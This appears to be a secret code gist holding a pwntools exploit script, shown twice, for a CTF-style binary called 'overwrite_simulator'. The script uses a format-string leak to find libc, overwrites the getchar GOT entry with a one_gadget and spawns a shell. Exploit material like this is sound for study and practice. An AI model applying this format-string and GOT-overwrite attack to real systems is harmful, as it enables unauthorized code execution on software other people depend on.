k1R4/exploit.py Secret

## exploit.py
from pwn import *

p = process("./overwrite_simulator")
elf = ELF("./overwrite_simulator")
libc = ELF("./libc.so.6")
context.binary = elf

hello_there = 0x404068
one_gadget = 0xe6c84
# execve("/bin/sh", rsi, rdx)
# constraints:
#   [rsi] == NULL || rsi == NULL
#   [rdx] == NULL || rdx == NULL

# Overwrite global variable to format string
p.sendlineafter(">> ", "1")
p.sendlineafter(": ", str(hello_there))
p.sendlineafter(": ", "%13$llx\x00")

# Use the format string to leak libc address on stack
p.sendlineafter(">> ", "2")
libc.address = int(p.recv(12),16) - 0x270b3
log.info("Libc -> "+hex(libc.address))

# Overwrite GOT(getchar) with one_gadget
p.sendlineafter(">> ", "1")
p.sendlineafter(": ", str(elf.got["getchar"]))
p.sendlineafter(": ", p64(libc.address+one_gadget))

# Trigger one_gadget at getchar after scanf in main
p.sendlineafter(">> ", "3")

p.interactive()
	from pwn import *

	p = process("./overwrite_simulator")
	elf = ELF("./overwrite_simulator")
	libc = ELF("./libc.so.6")
	context.binary = elf

	hello_there = 0x404068
	one_gadget = 0xe6c84
	# execve("/bin/sh", rsi, rdx)
	# constraints:
	# [rsi] == NULL \|\| rsi == NULL
	# [rdx] == NULL \|\| rdx == NULL

	# Overwrite global variable to format string
	p.sendlineafter(">> ", "1")
	p.sendlineafter(": ", str(hello_there))
	p.sendlineafter(": ", "%13$llx\x00")

	# Use the format string to leak libc address on stack
	p.sendlineafter(">> ", "2")
	libc.address = int(p.recv(12),16) - 0x270b3
	log.info("Libc -> "+hex(libc.address))

	# Overwrite GOT(getchar) with one_gadget
	p.sendlineafter(">> ", "1")
	p.sendlineafter(": ", str(elf.got["getchar"]))
	p.sendlineafter(": ", p64(libc.address+one_gadget))

	# Trigger one_gadget at getchar after scanf in main
	p.sendlineafter(">> ", "3")

	p.interactive()